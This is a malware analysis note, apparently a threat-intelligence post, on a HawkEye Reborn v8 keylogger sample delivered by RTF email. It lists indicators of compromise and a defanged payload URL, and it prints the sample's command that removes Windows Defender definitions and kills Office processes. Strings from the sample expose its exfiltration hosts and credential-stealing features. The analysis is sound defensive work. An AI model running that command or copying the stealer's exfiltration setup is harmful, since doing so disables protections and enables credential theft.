2018-06-06 #hawkeye #keylogger sample

1. found by @neonprimetime security
2. #rtf
3. 6/5/2018 email subject "R.F.Q. for the contract project procurement exercise ..."
4.  
5.  
6. 7f51124e0d15008cacd0a407d2ca9bf8
7. https://www.hybrid-analysis.com/sample/4eb5a28d72f55c6e8d4d80c650547266e6c9aa0b2a73f9253f3cc2a61010886f?environmentId=100
8. https://app.any.run/tasks/0b2f956d-d4a9-4672-98c3-c2c27cf1d718
9.  
10. opens excel
11. downloads
12. hxxp://stemtopx.com/work/new/14.exe
13. 46B255CB008D99DA1D0FE1EB51006A6A
14.  
15. copies itself to and runs from
16. C:\Users\Win732\AppData\Roaming\Microsoft\Windows\DsvHelper\filename.exe
17.  
18. also seen
19. C:\Users\Public\Host32.exe
20. EBDC467745BFCD089E1337D79A5AB422
21.  
22. runs this command
23. "C:\Windows\System32\cmd.exe" /c cd "C:\Program Files\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & exit
24.  
25. ----------
26. 14.exe is .NET dll so can see
27. WindowsApplication1.Shutdown_manager
28. public static byte[] FJaioefgkaoeK(byte[] Data)
29. {
30. ....
31. MyProject.Forms.Form1.TrackBar1.Value = Conversions.ToInteger(MyProject.Forms.Shutdown_manager.INI_ReadValueFromFile("Startseite", "Url", "", ".\\Configurations datei.ini"));
32. MyProject.Forms.Shutdown_manager.Herunterfahren.Stop();
33. MyProject.Forms.Shutdown_manager.Neustarten.Stop();
34. Interaction.MsgBox("Bitte geben sie eine zeit an!", MsgBoxStyle.Exclamation, "Countdown Konnte nicht eingeleitet werden!");
35. ....
36. }
37.  
38.  
39. --------
40. interesting in-memory strings
41. --------
42. 0x29f1c93 (17): ConfuserEx v1.0.0
43. 0x29f22c0 (104): HawkEye Keylogger - Reborn v8 - {0} Logs - {1} \ {2}
44. 0x29f2329 (122): HawkEye Keylogger - Reborn v8{0}{1} Logs{0}{2} \ {3}{0}{0}{4}
45. 0x29f244f (52): http://pomf.cat/upload.php
46. 0x29f2484 (38): https://a.pomf.cat/
47. 0x29f29d7 (26): passwordfile
48. 0x2b381b0 (14): _EmailUsername
49. 0x2b381bf (14): _EmailPassword
50. 0x2b381ce (12): _EmailServer
51. 0x2b381db (10): _EmailPort
52. 0x2b381f0 (10): _FTPServer
53. 0x2b381fb (12): _FTPUsername
54. 0x2b38208 (12): _FTPPassword
55. 0x2b38231 (12): _ProxySecret
56. 0x2b38248 (12): _PanelSecret
57. 0x2b38255 (12): _LogInterval
58. 0x2b38262 (16): _PasswordStealer
59. 0x2b38273 (16): _KeyStrokeLogger
60. 0x2b38284 (16): _ClipboardLogger
61. 0x2b38295 (17): _ScreenshotLogger
62. 0x2b382a7 (13): _WebCamLogger
63. 0x2b382b5 (11): _SystemInfo
64. 0x2b382ca (16): _InstallLocation
65. 0x2b382db (14): _InstallFolder
66. 0x2b382ea (16): _InstallFileName
67. 0x2b382fb (15): _InstallStartup
68. 0x2b3830b (26): _InstallStartupPersistance
69. 0x2b38326 (15): _HistoryCleaner
70. 0x2b38352 (10): _Disablers
71. 0x2b3835d (19): _DisableTaskManager
72. 0x2b38371 (21): _DisableCommandPrompt
73. 0x2b38387 (15): _DisableRegEdit
74. 0x2b38397 (18): _ProcessProtection
75. 0x2b383aa (17): _ProcessElevation
76. 0x2b383bc (16): _AntiVirusKiller
77. 0x2b383cd (10): _BotKiller
78. 0x2b383d8 (13): _AntiDebugger
79. 0x2b383e6 (15): _ExecutionDelay
80. 0x2b383f6 (16): _FakeMessageShow
81. 0x2b38407 (17): _FakeMessageTitle
82. 0x2b38419 (16): _FakeMessageText
83. 0x2b3842a (16): _FakeMessageIcon
84. 0x2b3843b (15): _WebsiteVisitor
85. 0x2b3844b (22): _WebsiteVisitorVisible
86. 0x2b38462 (20): _WebsiteVisitorSites
87. 0x2b38477 (15): _WebsiteBlocker
88. 0x2b38487 (20): _WebsiteBlockerSites
89. 0x2b3849c (11): _FileBinder
90. 0x2b384a8 (16): _FileBinderFiles